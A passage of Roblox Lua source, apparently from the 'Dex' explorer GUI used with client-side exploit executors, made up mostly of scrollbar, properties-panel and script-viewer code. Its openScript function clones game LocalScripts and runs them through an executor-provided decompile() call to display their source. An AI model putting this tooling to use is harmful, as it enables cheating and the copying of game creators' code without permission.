MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollUp() wait(0.2) while scrollEventID == current do Class:ScrollUp() if not Class:CanScrollUp() then break end wait() end end) ScrollUpFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) if horizontal then ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if x > ScrollThumbFrame.AbsolutePosition.x then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x < ScrollThumbFrame.AbsolutePosition.x + ScrollThumbFrame.AbsoluteSize.x then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x > ScrollThumbFrame.AbsolutePosition.x then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) else ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if y > ScrollThumbFrame.AbsolutePosition.y then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y < ScrollThumbFrame.AbsolutePosition.y + ScrollThumbFrame.AbsoluteSize.y then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y > ScrollThumbFrame.AbsolutePosition.y then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) end if horizontal then ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = x - ScrollThumbFrame.AbsolutePosition.x local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.x local bar_drag = ScrollBarFrame.AbsoluteSize.x - ScrollThumbFrame.AbsoluteSize.x local bar_abs_one = bar_abs_pos + bar_drag x = x - mouse_offset x = x < bar_abs_pos and bar_abs_pos or x > bar_abs_one and bar_abs_one or x x = x - bar_abs_pos Class:SetScrollPercent(x/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) else ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = y - ScrollThumbFrame.AbsolutePosition.y local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.y local bar_drag = ScrollBarFrame.AbsoluteSize.y - ScrollThumbFrame.AbsoluteSize.y local bar_abs_one = bar_abs_pos + bar_drag y = y - mouse_offset y = y < bar_abs_pos and bar_abs_pos or y > bar_abs_one and bar_abs_one or y y = y - bar_abs_pos Class:SetScrollPercent(y/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) end function Class:Destroy() ScrollFrame:Destroy() MouseDrag:Destroy() for k in pairs(Class) do Class[k] = nil end setmetatable(Class,nil) end Update() return Class end end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- local MainFrame = Instance.new("Frame") MainFrame.Name = "MainFrame" MainFrame.Size = UDim2.new(1, -1 * ScrollBarWidth, 1, 0) MainFrame.Position = UDim2.new(0, 0, 0, 0) MainFrame.BackgroundTransparency = 1 MainFrame.ClipsDescendants = true MainFrame.Parent = PropertiesFrame ContentFrame = Instance.new("Frame") ContentFrame.Name = "ContentFrame" ContentFrame.Size = UDim2.new(1, 0, 0, 0) ContentFrame.BackgroundTransparency = 1 ContentFrame.Parent = MainFrame scrollBar = ScrollBar(false) scrollBar.PageIncrement = 1 Create(scrollBar.GUI,{ Position = UDim2.new(1,-ScrollBarWidth,0,0); Size = UDim2.new(0,ScrollBarWidth,1,0); Parent = PropertiesFrame; }) scrollBarH = ScrollBar(true) scrollBarH.PageIncrement = ScrollBarWidth Create(scrollBarH.GUI,{ Position = UDim2.new(0,0,1,-ScrollBarWidth); Size = UDim2.new(1,-ScrollBarWidth,0,ScrollBarWidth); Visible = false; Parent = PropertiesFrame; }) do local listEntries = {} local nameConnLookup = {} function scrollBar.UpdateCallback(self) scrollBar.TotalSpace = ContentFrame.AbsoluteSize.Y scrollBar.VisibleSpace = MainFrame.AbsoluteSize.Y ContentFrame.Position = UDim2.new(ContentFrame.Position.X.Scale,ContentFrame.Position.X.Offset,0,-1*scrollBar.ScrollIndex) end function scrollBarH.UpdateCallback(self) end MainFrame.Changed:connect(function(p) if p == 'AbsoluteSize' then scrollBarH.VisibleSpace = math.ceil(MainFrame.AbsoluteSize.x) scrollBarH:Update() scrollBar.VisibleSpace = math.ceil(MainFrame.AbsoluteSize.y) scrollBar:Update() end end) local wheelAmount = Row.Height PropertiesFrame.MouseWheelForward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex - wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex - scrollBar.VisibleSpace) end end) PropertiesFrame.MouseWheelBackward:connect(function() if scrollBar.VisibleSpace - 1 > wheelAmount then scrollBar:ScrollTo(scrollBar.ScrollIndex + wheelAmount) else scrollBar:ScrollTo(scrollBar.ScrollIndex + scrollBar.VisibleSpace) end end) end scrollBar.VisibleSpace = math.ceil(MainFrame.AbsoluteSize.y) scrollBar:Update() showProperties(GetSelection()) bindSelectionChanged.Event:connect(function() showProperties(GetSelection()) end) bindSetAwait.Event:connect(function(obj) if AwaitingObjectValue then AwaitingObjectValue = false local mySel = obj if mySel then pcall(function() Set(AwaitingObjectObj, AwaitingObjectProp, mySel) end) end end end) propertiesSearch.Changed:connect(function(prop) if prop == "Text" then showProperties(GetSelection()) end end) bindGetApi.OnInvoke = function() return RbxApi end bindGetAwait.OnInvoke = function() return AwaitingObjectValue end end) spawn(function() local top = D_E_X.ScriptEditor local editorGrid = top:WaitForChild("EditorGrid") local currentSource = "" local currentEditor = { x = 0, y = 0 } local userInput = game:GetService("UserInputService") local mouse = game:GetService("Players").LocalPlayer:GetMouse() local topBar = top:WaitForChild("TopBar") local scriptBar = topBar:WaitForChild("ScriptBar") local scriptBarLeft = topBar:WaitForChild("ScriptBarLeft") local scriptBarRight = topBar:WaitForChild("ScriptBarRight") local clipboardButton = topBar:WaitForChild("Clipboard") local entryTemplate = topBar:WaitForChild("Entry") local openEvent = top:WaitForChild("OpenScript") local closeButton = top:WaitForChild("Close") local memoryScripts = {} local editingIndex = 0 -- Scrollbar local ScrollBarWidth = 16 local ScrollStyles = { Background = Color3.new(233/255, 233/255, 233/255); Border = Color3.new(149/255, 149/255, 149/255); Selected = Color3.new( 63/255, 119/255, 189/255); BorderSelected = Color3.new( 55/255, 106/255, 167/255); Text = Color3.new( 0/255, 0/255, 0/255); TextDisabled = Color3.new(128/255, 128/255, 128/255); TextSelected = Color3.new(255/255, 255/255, 255/255); Button = Color3.new(221/255, 221/255, 221/255); ButtonBorder = Color3.new(149/255, 149/255, 149/255); ButtonSelected = Color3.new(255/255, 0/255, 0/255); Field = Color3.new(255/255, 255/255, 255/255); FieldBorder = Color3.new(191/255, 191/255, 191/255); TitleBackground = Color3.new(178/255, 178/255, 178/255); } do local ZIndexLock = {} function SetZIndex(object,z) if not ZIndexLock[object] then ZIndexLock[object] = true if object:IsA'GuiObject' then object.ZIndex = z end local children = object:GetChildren() for i = 1,#children do SetZIndex(children[i],z) end ZIndexLock[object] = nil end end end function SetZIndexOnChanged(object) return object.Changed:connect(function(p) if p == "ZIndex" then SetZIndex(object,object.ZIndex) end end) end function Create(ty,data) local obj if type(ty) == 'string' then obj = Instance.new(ty) else obj = ty end for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj else obj[k] = v end end return obj end -- returns the ascendant ScreenGui of an object function GetScreen(screen) if screen == nil then return nil end while not screen:IsA("ScreenGui") do screen = screen.Parent if screen == nil then return nil end end return screen end -- AutoButtonColor doesn't always reset properly function ResetButtonColor(button) local active = button.Active button.Active = not active button.Active = active end function ArrowGraphic(size,dir,scaled,template) local Frame = Create('Frame',{ Name = "Arrow Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size,0,size); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end local transform if dir == nil or dir == 'Up' then function transform(p,s) return p,s end elseif dir == 'Down' then function transform(p,s) return UDim2.new(0,p.X.Offset,0,size-p.Y.Offset-1),s end elseif dir == 'Left' then function transform(p,s) return UDim2.new(0,p.Y.Offset,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end elseif dir == 'Right' then function transform(p,s) return UDim2.new(0,size-p.Y.Offset-1,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end end local scale if scaled then function scale(p,s) return UDim2.new(p.X.Offset/size,0,p.Y.Offset/size,0),UDim2.new(s.X.Offset/size,0,s.Y.Offset/size,0) end else function scale(p,s) return p,s end end local o = math.floor(size/4) if size%2 == 0 then local n = size/2-1 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,(i+1)*2,0,1) )) t.Position = p t.Size = s t.Parent = Frame end else local n = (size-1)/2 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,i*2+1,0,1) )) t.Position = p t.Size = s t.Parent = Frame end end if size%4 > 1 then local t = template:Clone() local p,s = scale(transform( UDim2.new(0,0,0,size-o-1), UDim2.new(0,size,0,1) )) t.Position = p t.Size = s t.Parent = Frame end return Frame end function GripGraphic(size,dir,spacing,scaled,template) local Frame = Create('Frame',{ Name = "Grip Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size.x,0,size.y); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end spacing = spacing or 2 local scale if scaled then function scale(p) return UDim2.new(p.X.Offset/size.x,0,p.Y.Offset/size.y,0) end else function scale(p) return p end end if dir == 'Vertical' then for i=0,size.x-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,1,0,size.y)) t.Position = scale(UDim2.new(0,i,0,0)) t.Parent = Frame end elseif dir == nil or dir == 'Horizontal' then for i=0,size.y-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,size.x,0,1)) t.Position = scale(UDim2.new(0,0,0,i)) t.Parent = Frame end end return Frame end do local mt = { __index = { GetScrollPercent = function(self) return self.ScrollIndex/(self.TotalSpace-self.VisibleSpace) end; CanScrollDown = function(self) return self.ScrollIndex + self.VisibleSpace < self.TotalSpace end; CanScrollUp = function(self) return self.ScrollIndex > 0 end; ScrollDown = function(self) self.ScrollIndex = self.ScrollIndex + self.PageIncrement self:Update() end; ScrollUp = function(self) self.ScrollIndex = self.ScrollIndex - self.PageIncrement self:Update() end; ScrollTo = function(self,index) self.ScrollIndex = index self:Update() end; SetScrollPercent = function(self,percent) self.ScrollIndex = math.floor((self.TotalSpace - self.VisibleSpace)*percent + 0.5) self:Update() end; }; } mt.__index.CanScrollRight = mt.__index.CanScrollDown mt.__index.CanScrollLeft = mt.__index.CanScrollUp mt.__index.ScrollLeft = mt.__index.ScrollUp mt.__index.ScrollRight = mt.__index.ScrollDown function ScrollBar(horizontal) -- create row scroll bar local ScrollFrame = Create('Frame',{ Name = "ScrollFrame"; Position = horizontal and UDim2.new(0,0,1,-ScrollBarWidth) or UDim2.new(1,-ScrollBarWidth,0,0); Size = horizontal and UDim2.new(1,0,0,ScrollBarWidth) or UDim2.new(0,ScrollBarWidth,1,0); BackgroundTransparency = 1; Create('ImageButton',{ Name = "ScrollDown"; Position = horizontal and UDim2.new(1,-ScrollBarWidth,0,0) or UDim2.new(0,0,1,-ScrollBarWidth); Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollUp"; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollBar"; Size = horizontal and UDim2.new(1,-ScrollBarWidth*2,1,0) or UDim2.new(1,0,1,-ScrollBarWidth*2); Position = horizontal and UDim2.new(0,ScrollBarWidth,0,0) or UDim2.new(0,0,0,ScrollBarWidth); AutoButtonColor = false; BackgroundColor3 = Color3.new(0.94902, 0.94902, 0.94902); BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; Create('ImageButton',{ Name = "ScrollThumb"; AutoButtonColor = false; Size = UDim2.new(0, ScrollBarWidth, 0, ScrollBarWidth); BackgroundColor3 = ScrollStyles.Button; BorderColor3 = ScrollStyles.Border; --BorderSizePixel = 0; }); }); }) local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = ScrollStyles.Border; }) local graphicSize = ScrollBarWidth/2 local ScrollDownFrame = ScrollFrame.ScrollDown local ScrollDownGraphic = ArrowGraphic(graphicSize,horizontal and 'Right' or 'Down',true,graphicTemplate) ScrollDownGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollDownGraphic.Parent = ScrollDownFrame local ScrollUpFrame = ScrollFrame.ScrollUp local ScrollUpGraphic = ArrowGraphic(graphicSize,horizontal and 'Left' or 'Up',true,graphicTemplate) ScrollUpGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollUpGraphic.Parent = ScrollUpFrame local ScrollBarFrame = ScrollFrame.ScrollBar local ScrollThumbFrame = ScrollBarFrame.ScrollThumb do local size = ScrollBarWidth*3/8 local Decal = GripGraphic(Vector2.new(size,size),horizontal and 'Vertical' or 'Horizontal',2,graphicTemplate) Decal.Position = UDim2.new(0.5,-size/2,0.5,-size/2) Decal.Parent = ScrollThumbFrame end local MouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local Class = setmetatable({ GUI = ScrollFrame; ScrollIndex = 0; VisibleSpace = 0; TotalSpace = 0; PageIncrement = 1; },mt) local UpdateScrollThumb if horizontal then function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(Class.VisibleSpace/Class.TotalSpace,0,0,ScrollBarWidth) if ScrollThumbFrame.AbsoluteSize.x < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.x ScrollThumbFrame.Position = UDim2.new(Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.x)/barSize,0,0,0) end else function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,Class.VisibleSpace/Class.TotalSpace,0) if ScrollThumbFrame.AbsoluteSize.y < ScrollBarWidth then ScrollThumbFrame.Size = UDim2.new(0,ScrollBarWidth,0,ScrollBarWidth) end local barSize = ScrollBarFrame.AbsoluteSize.y ScrollThumbFrame.Position = UDim2.new(0,0,Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.y)/barSize,0) end end local lastDown local lastUp local scrollStyle = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0} local scrollStyle_ds = {BackgroundColor3=ScrollStyles.Border,BackgroundTransparency=0.7} local function Update() local t = Class.TotalSpace local v = Class.VisibleSpace local s = Class.ScrollIndex if v <= t then if s > 0 then if s + v > t then Class.ScrollIndex = t - v end else Class.ScrollIndex = 0 end else Class.ScrollIndex = 0 end if Class.UpdateCallback then if Class.UpdateCallback(Class) == false then return end end local down = Class:CanScrollDown() local up = Class:CanScrollUp() if down ~= lastDown then lastDown = down ScrollDownFrame.Active = down ScrollDownFrame.AutoButtonColor = down local children = ScrollDownGraphic:GetChildren() local style = down and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end if up ~= lastUp then lastUp = up ScrollUpFrame.Active = up ScrollUpFrame.AutoButtonColor = up local children = ScrollUpGraphic:GetChildren() local style = up and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end ScrollThumbFrame.Visible = down or up UpdateScrollThumb() end Class.Update = Update SetZIndexOnChanged(ScrollFrame) local scrollEventID = 0 ScrollDownFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollDownFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollDown() wait(0.2) -- delay before auto scroll while scrollEventID == current do Class:ScrollDown() if not Class:CanScrollDown() then break end wait() end end) ScrollDownFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) ScrollUpFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollUp() wait(0.2) while scrollEventID == current do Class:ScrollUp() if not Class:CanScrollUp() then break end wait() end end) ScrollUpFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) if horizontal then ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if x > ScrollThumbFrame.AbsolutePosition.x then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x < ScrollThumbFrame.AbsolutePosition.x + ScrollThumbFrame.AbsoluteSize.x then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x > ScrollThumbFrame.AbsolutePosition.x then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) else ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if y > ScrollThumbFrame.AbsolutePosition.y then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y < ScrollThumbFrame.AbsolutePosition.y + ScrollThumbFrame.AbsoluteSize.y then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y > ScrollThumbFrame.AbsolutePosition.y then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) end if horizontal then ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = x - ScrollThumbFrame.AbsolutePosition.x local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.x local bar_drag = ScrollBarFrame.AbsoluteSize.x - ScrollThumbFrame.AbsoluteSize.x local bar_abs_one = bar_abs_pos + bar_drag x = x - mouse_offset x = x < bar_abs_pos and bar_abs_pos or x > bar_abs_one and bar_abs_one or x x = x - bar_abs_pos Class:SetScrollPercent(x/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) else ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = y - ScrollThumbFrame.AbsolutePosition.y local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.y local bar_drag = ScrollBarFrame.AbsoluteSize.y - ScrollThumbFrame.AbsoluteSize.y local bar_abs_one = bar_abs_pos + bar_drag y = y - mouse_offset y = y < bar_abs_pos and bar_abs_pos or y > bar_abs_one and bar_abs_one or y y = y - bar_abs_pos Class:SetScrollPercent(y/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) end function Class:Destroy() ScrollFrame:Destroy() MouseDrag:Destroy() for k in pairs(Class) do Class[k] = nil end setmetatable(Class,nil) end Update() return Class end end -- End Scrollbar local scrollBar = ScrollBar(false) scrollBar.PageIncrement = 16 Create(scrollBar.GUI,{ Position = UDim2.new(1,0,0,0); Size = UDim2.new(0,ScrollBarWidth,1,0); Parent = editorGrid; }) local scrollBarH = ScrollBar(true) scrollBarH.PageIncrement = 8 Create(scrollBarH.GUI,{ Position = UDim2.new(0,0,1,0); Size = UDim2.new(1,0,0,ScrollBarWidth); Parent = editorGrid; }) local entries = {} local grid = {} local count = 1 local xCount = 1 local lineSpan = 0 for i = 0,490,8 do local newRow = {} for j = 0,390,16 do local cellText = Instance.new("TextLabel",editorGrid) cellText.BackgroundTransparency = 1 cellText.BorderSizePixel = 0 cellText.Text = "" cellText.Position = UDim2.new(0,i,0,j) cellText.Size = UDim2.new(0,8,0,16) cellText.Font = Enum.Font.SourceSans cellText.FontSize = Enum.FontSize.Size18 table.insert(newRow,cellText) xCount = xCount + 1 end table.insert(grid,newRow) count = count + 1 xCount = 1 end local syntaxHighlightList = { {["Keyword"] = "for", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "local", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "if", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "then", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "do", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "while", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "end", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "function", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "string", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "table", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "game", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "workspace", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "return", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "break", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "elseif", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "in", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "pairs", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true}, {["Keyword"] = "ipairs", ["Color"] = Color3.new(0, 0, 127/255), ["Independent"] = true} } function checkMouseInGui(gui) if gui == nil then return false end local plrMouse = game:GetService("Players").LocalPlayer:GetMouse() local guiPosition = gui.AbsolutePosition local guiSize = gui.AbsoluteSize if plrMouse.X >= guiPosition.x and plrMouse.X <= guiPosition.x + guiSize.x and plrMouse.Y >= guiPosition.y and plrMouse.Y <= guiPosition.y + guiSize.y then return true else return false end end function AddZeros(num,reach) local toConvert = tostring(num) while #toConvert < reach do toConvert = " "..toConvert end return toConvert end function buildScript(source,xOff,yOff,override) local buildingRows = true local buildScr = source local totalLines = 0 --print(xOff,yOff) if currentSource ~= source then currentSource = source end if override then currentSource = source entries = {} while buildingRows do local x,y = string.find(buildScr,"\n") if x and y then table.insert(entries,string.sub(buildScr,1,y)) buildScr = string.sub(buildScr,y+1,string.len(buildScr)) else buildingRows = false table.insert(entries,buildScr) end end end totalLines = #entries lineSpan = #tostring(totalLines) if lineSpan == 1 then lineSpan = 2 end local currentRow = 1 local currentColumn = 2 + lineSpan local colorTime = 0 local colorReplace = nil local inString = false local workingEntries = entries --[[ for i,v in pairs(entries) do table.insert(workingEntries,v) end for i = 1,yOff do table.remove(workingEntries,1) end --]] local delayance = xOff for i = 1,#grid do for j = 1,#grid[i] do if i <= lineSpan then local newNum = AddZeros(yOff + j,lineSpan) local newDigit = string.sub(newNum,i,i) if newDigit == " " then grid[i][j].Text = "" else grid[i][j].Text = newDigit end grid[i][j].BackgroundTransparency = 0 grid[i][j].BackgroundColor3 = Color3.new(163/255, 162/255, 165/255) --grid[i][j].Font = Enum.Font.SourceSansBold elseif i == lineSpan + 1 then grid[i][j].Text = "" grid[i][j].BackgroundTransparency = 0 grid[i][j].BackgroundColor3 = Color3.new(200/255, 200/255, 200/255) --grid[i][j].Font = Enum.Font.SourceSans else grid[i][j].Text = "" grid[i][j].BackgroundTransparency = 1 --grid[i][j].Font = Enum.Font.SourceSans end end end while true do if currentRow > #workingEntries or currentRow > #grid[1] then break end local entry = workingEntries[currentRow+yOff] while string.len(entry) > 0 do if string.sub(entry,1,1) == "\t" then entry = " "..string.sub(entry,2) end if currentColumn > #grid then break end if delayance == 0 then grid[currentColumn][currentRow].Text = string.sub(entry,1,1) end -- Coloring if not inString then for i,v in pairs(syntaxHighlightList) do if string.sub(entry,1,string.len(v["Keyword"])) == v["Keyword"] then if v["Independent"] then local outCheck = string.len(v["Keyword"])+1 local outEntry = string.sub(entry,outCheck,outCheck) if not string.find(outEntry,"%w") then colorTime = string.len(v["Keyword"]) colorReplace = v["Color"] end else colorTime = string.len(v["Keyword"]) colorReplace = v["Color"] end end end end if string.sub(entry,1,1) == "\"" and string.match(entry,"\".+\"") then inString = true colorTime = string.len(string.match(entry,"\".+\"")) colorReplace = Color3.new(170/255, 0, 1) end if colorTime > 0 then colorTime = colorTime - 1 grid[currentColumn][currentRow].TextColor3 = colorReplace if colorTime == 0 then inString = false end else grid[currentColumn][currentRow].TextColor3 = Color3.new(0,0,0) inString = false end if delayance == 0 then currentColumn = currentColumn + 1 else delayance = delayance - 1 end entry = string.sub(entry,2,string.len(entry)) end currentRow = currentRow + 1 currentColumn = 2 + lineSpan colorTime = 0 delayance = xOff inString = false end end function scrollBar.UpdateCallback(self) scrollBar.TotalSpace = #entries * 16 scrollBar.VisibleSpace = editorGrid.AbsoluteSize.Y buildScript(currentSource,math.floor(scrollBarH.ScrollIndex/8),math.floor(scrollBar.ScrollIndex/16)) end function scrollBarH.UpdateCallback(self) scrollBarH.TotalSpace = (getLongestEntry(entries) + 1 + lineSpan) * 8 scrollBarH.VisibleSpace = editorGrid.AbsoluteSize.X buildScript(currentSource,math.floor(scrollBarH.ScrollIndex/8),math.floor(scrollBar.ScrollIndex/16)) end function getLongestEntry(tab) local longest = 0 for i,v in pairs(tab) do if string.len(v) > longest then longest = string.len(v) end end return longest end function openScript(scrObj) if scrObj:IsA("LocalScript") then scrObj.Archivable = true scrObj = scrObj:Clone() scrObj.Disabled = true end local scrName = scrObj.Name local scrSource = decompile(scrObj) table.insert(memoryScripts,{Name = scrName,Source = scrSource}) local newTab = entryTemplate:Clone() newTab.Button.Text = scrName newTab.Position = UDim2.new(0,#scriptBar:GetChildren() * 100,0,0) newTab.Visible = true newTab.Button.MouseButton1Down:connect(function() for i,v in pairs(scriptBar:GetChildren()) do if v == newTab then editingIndex = i buildScript(memoryScripts[i].Source,0,0,true) scrollBar:ScrollTo(1) scrollBar:Update() scrollBarH:ScrollTo(1) scrollBarH:Update() end end end) newTab.Close.MouseButton1Click:connect(function() for i,v in pairs(scriptBar:GetChildren()) do if v == newTab then table.remove(memoryScripts,i) if editingIndex == i then editingIndex = #memoryScripts if editingIndex > 0 then buildScript(memoryScripts[#memoryScripts].Source,0,0,true) else buildScript("",0,0,true) end end scrollBar:ScrollTo(1) scrollBar:Update() scrollBarH:ScrollTo(1) scrollBarH:Update() for i2 = i,#scriptBar:GetChildren() do scriptBar:GetChildren()[i2].Position = scriptBar:GetChildren()[i2].Position + UDim2.new(0,-100,0,0) end if editingIndex > i then editingIndex = editingIndex - 1 end newTab:Destroy() end end end) editingIndex = #memoryScripts 